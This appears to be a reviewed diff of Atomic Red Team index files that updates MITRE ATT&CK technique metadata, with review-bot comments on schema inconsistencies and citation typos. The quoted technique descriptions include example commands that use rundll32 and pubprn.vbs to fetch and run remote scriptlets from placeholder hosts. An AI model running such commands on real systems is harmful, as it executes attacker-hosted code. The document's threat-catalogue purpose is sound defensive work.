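Review bot: this hunk removes both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` from T1029 without adding a replacement, whereas entries elsewhere in the patch (T1078.003 and T1567 above, for example) keep `x_mitre_attack_spec_version` and only bump it to 3.2.0. The same removal recurs for T1011.001, T1048.001, T1052.001, T1030, T1052 and T1048.002, so after this change some techniques carry a spec version and some carry none. If the generator mirrors whatever fields the upstream object has, that is expected, but code that reads `x_mitre_attack_spec_version` unconditionally will now hit a missing key; a line in the PR on why these objects lost the field would help reviewers.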
@@ -61060,7 +61949,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1011.001:
technique:
@@ -61080,7 +61968,7 @@ exfiltration:
- source_name: mitre-attack
external_id: T1011.001
url: https://attack.mitre.org/techniques/T1011/001
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:02:15.802Z'
name: Exfiltration Over Bluetooth
description: |-
Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.
@@ -61102,8 +61990,6 @@ exfiltration:
- 'File: File Access'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1020:
technique:
@@ -61157,7 +62043,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1020
atomic_tests: []
T1048.001:
@@ -61182,7 +62067,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-28T00:43:24.228Z'
name: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
description: "Adversaries may steal data by exfiltrating it over a symmetrically
encrypted network protocol other than that of the existing command and control
@@ -61217,12 +62102,10 @@ exfiltration:
- 'Command: Command Execution'
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1020.001:
technique:
- modified: '2023-04-14T23:23:30.327Z'
+ modified: '2024-10-15T16:08:13.273Z'
name: Traffic Duplication
description: |-
Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
@@ -61247,11 +62130,10 @@ exfiltration:
x_mitre_platforms:
- Network
- IaaS
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Flow'
- x_mitre_network_requirements: false
type: attack-pattern
id: attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1
created: '2020-10-19T13:40:11.118Z'
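Review bot: `x_mitre_network_requirements: false` is deleted from T1020.001 alongside the version bump to 1.3, and the same key is deleted from T1048 further down. Dropping the key rather than keeping it with a value changes the shape of the record; any test-selection or reporting code that reads that flag should be made tolerant of its absence before this lands.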
@@ -61294,9 +62176,8 @@ exfiltration:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1567.001:
technique:
@@ -61343,7 +62224,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1048.002:
technique:
@@ -61369,7 +62249,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:44:11.953Z'
name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric
Encrypted Non-C2 Protocol
description: "Adversaries may steal data by exfiltrating it over an asymmetrically
@@ -61402,13 +62282,11 @@ exfiltration:
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1048.002
atomic_tests: []
T1041:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:09:14.040Z'
name: Exfiltration Over C2 Channel
description: Adversaries may steal data by exfiltrating it over an existing
command and control channel. Stolen data is encoded into the normal communications
@@ -61457,12 +62335,11 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1041
atomic_tests: []
T1048:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:57:26.415Z'
name: Exfiltration Over Alternative Protocol
description: "Adversaries may steal data by exfiltrating it over a different
protocol than that of the existing command and control channel. The data may
@@ -61498,12 +62375,11 @@ exfiltration:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Network
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Cloud Storage: Cloud Storage Access'
- 'Network Traffic: Network Traffic Flow'
@@ -61512,7 +62388,6 @@ exfiltration:
- 'Application Log: Application Log Content'
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- x_mitre_network_requirements: false
type: attack-pattern
id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776
created: '2017-05-31T21:30:44.720Z'
@@ -61536,9 +62411,8 @@ exfiltration:
url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1048
atomic_tests: []
T1052.001:
@@ -61561,7 +62435,7 @@ exfiltration:
- source_name: mitre-attack
external_id: T1052.001
url: https://attack.mitre.org/techniques/T1052/001
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:48:29.490Z'
name: Exfiltration over USB
description: Adversaries may attempt to exfiltrate data over a USB connected
physical device. In certain circumstances, such as an air-gapped network compromise,
@@ -61583,8 +62457,6 @@ exfiltration:
- 'Command: Command Execution'
x_mitre_system_requirements:
- Presence of physical medium or device
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1567.003:
technique:
@@ -61635,7 +62507,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1567.003
atomic_tests: []
T1567.002:
@@ -61685,7 +62556,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1567.002
atomic_tests: []
T1030:
@@ -61710,7 +62580,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:47:46.912Z'
name: Data Transfer Size Limits
description: An adversary may exfiltrate data in fixed size chunks instead of
whole files or limit packet sizes below certain thresholds. This approach
@@ -61733,13 +62603,11 @@ exfiltration:
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Flow'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1030
atomic_tests: []
T1537:
technique:
- modified: '2024-04-11T15:53:00.577Z'
+ modified: '2024-10-15T16:08:25.344Z'
name: Transfer Data to Cloud Account
description: "Adversaries may exfiltrate data by transferring the data, including
through sharing/syncing and creating backups of cloud environments, to another
@@ -61780,9 +62648,8 @@ exfiltration:
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Office 365
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Cloud Storage: Cloud Storage Modification'
- 'Snapshot: Snapshot Creation'
@@ -61830,7 +62697,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1052:
technique:
@@ -61852,7 +62718,7 @@ exfiltration:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1052
external_id: T1052
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:48:29.702Z'
name: Exfiltration Over Physical Medium
description: Adversaries may attempt to exfiltrate data via a physical medium,
such as a removable drive. In certain circumstances, such as an air-gapped
@@ -61876,12 +62742,10 @@ exfiltration:
x_mitre_system_requirements:
- Presence of physical medium or device
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1048.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-12T23:39:25.476Z'
name: 'Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated
Non-C2 Protocol'
description: "Adversaries may steal data by exfiltrating it over an un-encrypted
@@ -61945,6 +62809,5 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1048.003
atomic_tests: []
diff --git a/atomics/Indexes/google-workspace-index.yaml b/atomics/Indexes/google-workspace-index.yaml
index 9c98e45763..13b3c58592 100644
--- a/atomics/Indexes/google-workspace-index.yaml
+++ b/atomics/Indexes/google-workspace-index.yaml
@@ -45,7 +45,7 @@ defense-evasion:
description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
16, 2017.
source_name: Microsoft SendNotifyMessage function
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.004Z'
name: 'Process Injection: Extra Window Memory Injection'
description: "Adversaries may inject malicious code into process via Extra Window
Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -97,13 +97,11 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.011
atomic_tests: []
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -166,21 +164,27 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-04T15:05:25.388Z'
name: Fileless Storage
description: "Adversaries may store data in \"fileless\" formats to conceal
malicious activity from defenses. Fileless storage can be broadly defined
as any format other than a file. Common examples of non-volatile fileless
- storage include the Windows Registry, event logs, or WMI repository.(Citation:
- Microsoft Fileless)(Citation: SecureList Fileless)\n\nSimilar to fileless
- in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
+ storage in Windows systems include the Windows Registry, event logs, or WMI
+ repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) In
+ Linux systems, shared memory directories such as `/dev/shm`, `/run/shm`, `/var/run`,
+ and `/var/lock` may also be considered fileless storage, as files written
+ to these directories are mapped directly to RAM and not stored on the disk.(Citation:
+ Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell
+ 2024)(Citation: Aquasec Muhstik Malware 2024)\n\nSimilar to fileless in-memory
+ behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless
data storage may remain undetected by anti-virus and other endpoint security
- tools that can only access specific file formats from disk storage.\n\nAdversaries
+ tools that can only access specific file formats from disk storage. Leveraging
+ fileless storage may also allow adversaries to bypass the protections offered
+ by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries
may use fileless storage to conceal various types of stored data, including
payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003))
and collected data not yet exfiltrated from the victim (e.g., [Local Data
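Review bot: the citation key `Akami Frog4Shell 2024` in the new description text misspells the vendor (the referenced URL is on akamai.com), and `Sysdig Fileless Malware 23022` carries a mistyped year. Both keys appear verbatim in the reference entries added later in this file, so text and references still resolve against each other; because the strings come from upstream ATT&CK, correcting them only here would break that lookup and diverge from the source, so the fix belongs upstream. On substance, the description now names `/dev/shm`, `/run/shm`, `/var/run` and `/var/lock` as Linux fileless storage, which lines up with the `Linux` platform and `Process: Process Creation` data source added to the same technique below; good that the two land together, since the data source is what makes execution from those paths observable.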
@@ -200,6 +204,7 @@ defense-evasion:
- Mark Wee
- Simona David
- Xavier Rousseau
+ - Vito Alfano, Group-IB
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -207,10 +212,12 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.0'
+ - Linux
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'WMI: WMI Creation'
+ - 'Process: Process Creation'
type: attack-pattern
id: attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939
created: '2023-03-23T19:55:25.546Z'
@@ -220,6 +227,14 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1027/011
external_id: T1027.011
+ - source_name: Aquasec Muhstik Malware 2024
+ description: " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message
+ Queuing Services Applications. Retrieved September 24, 2024."
+ url: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/
+ - source_name: Elastic Binary Executed from Shared Memory Directory
+ description: Elastic. (n.d.). Binary Executed from Shared Memory Directory.
+ Retrieved September 24, 2024.
+ url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html
- source_name: SecureList Fileless
description: Legezo, D. (2022, May 4). A new secret stash for “fileless” malware.
Retrieved March 23, 2023.
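Review bot: the new `Aquasec Muhstik Malware 2024` reference has a leading space inside its quoted `description` (`" Nitzan Yaakov. (2024, June 4)...`), unlike the neighbouring references, so it will render as ` Nitzan Yaakov`. It is carried over from the upstream STIX text, so strip it there rather than in this index; otherwise it will keep reappearing as churn every time the file is regenerated.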
@@ -228,15 +243,22 @@ defense-evasion:
description: Microsoft. (2023, February 6). Fileless threats. Retrieved March
23, 2023.
url: https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats
+ - source_name: Sysdig Fileless Malware 23022
+ description: Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved
+ September 24, 2024.
+ url: https://sysdig.com/blog/containers-read-only-fileless-malware/
+ - source_name: Akami Frog4Shell 2024
+ description: Ori David. (2024, February 1). Frog4Shell — FritzFrog Botnet
+ Adds One-Days to Its Arsenal. Retrieved September 24, 2024.
+ url: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.011:
technique:
- modified: '2023-08-14T15:35:28.965Z'
+ modified: '2024-10-14T13:14:43.083Z'
name: 'Signed Binary Proxy Execution: Rundll32'
description: "Adversaries may abuse rundll32.exe to proxy execution of malicious
code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)),
@@ -247,10 +269,10 @@ defense-evasion:
also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002)
Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL
and Control_RunDLLAsUser
. Double-clicking a .cpl file also causes
- rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also
- be used to execute scripts such as JavaScript. This can be done using a syntax
- similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication
- \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"
+ rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002)
+ can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute
+ scripts such as JavaScript. This can be done using a syntax similar to this:
+ rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"
\ This behavior has been seen used by malware such as Poweliks. (Citation:
This is Security Command Line Confusion)\n\nAdversaries may also attempt to
obscure malicious code from analysis by abusing the manner in which rundll32.exe
@@ -286,7 +308,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
@@ -316,7 +338,7 @@ defense-evasion:
- source_name: This is Security Command Line Confusion
description: B. Ancel. (2014, August 20). Poweliks – Command Line Confusion.
Retrieved March 5, 2018.
- url: https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/
+ url: https://www.stormshield.com/news/poweliks-command-line-confusion/
- source_name: Github NoRunDll
description: gtworek. (2019, December 17). NoRunDll. Retrieved August 23,
2021.
@@ -327,9 +349,8 @@ defense-evasion:
url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.011
atomic_tests: []
T1027.009:
@@ -419,49 +440,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
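Review bot: the unchanged description context at the end of this hunk shows `pam_unix.so`, `/etc/passwd` and `/etc/shadow` each starting a line of their own, followed by the dangling `, which retrieves` and `.(Citation: ...)` fragments: inline-code markup was stripped when the upstream text was flattened, leaving the sentence broken. This is pre-existing rather than introduced here, and the same flattening affects `/etc/pam.d/` in the detection text of this technique and the `script:`, `PubPrn.vbs` and `LDAP://` fragments in the T1216.001 entry below, so the fix belongs in the generator's text conversion, not in these lines.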
@@ -476,20 +458,57 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1578.004:
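Review bot: `x_mitre_permissions_required` with its `- root` entry is removed from T1556.003 and nothing in the rebuilt block carries that information forward; the block instead gains `x_mitre_deprecated: false` and `revoked: false` and reorders the existing contributors, platforms and references. The root requirement is still implied by the description (modifying PAM modules and `/etc/pam.d/`), but code that gated this technique on `x_mitre_permissions_required` will no longer see it, and T1578.004 below keeps its own `x_mitre_permissions_required: - User`, so the field's treatment is inconsistent across the patch; worth confirming this mirrors upstream rather than a generator quirk.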
@@ -518,7 +537,7 @@ defense-evasion:
url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots
description: Google. (2019, October 7). Restoring and deleting persistent
disk snapshots. Retrieved October 8, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-03-08T10:33:02.128Z'
name: Revert Cloud Instance
description: |-
An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
@@ -545,8 +564,6 @@ defense-evasion:
- 'Instance: Instance Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1564.012:
technique:
@@ -588,7 +605,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1222.002:
technique:
@@ -666,7 +682,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222.002
atomic_tests: []
T1216.001:
@@ -703,7 +718,7 @@ defense-evasion:
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script:
parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct
. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), PubPrn.vbs
has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://
, vice the script:
moniker which could be used to reference remote code via HTTP(S).
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-18T14:55:35.817Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Signed Script Proxy Execution: Pubprn'
x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -722,7 +737,6 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1216.001
atomic_tests: []
T1574.007:
@@ -812,7 +826,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1006:
technique:
@@ -870,12 +883,87 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1006
atomic_tests: []
+ T1666:
+ technique:
+ modified: '2024-09-25T16:15:41.224Z'
+ name: Modify Cloud Resource Hierarchy
+ description: "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service
+ (IaaS) environments in order to evade defenses. \n\nIaaS environments often
+ group resources into a hierarchy, enabling improved resource management and
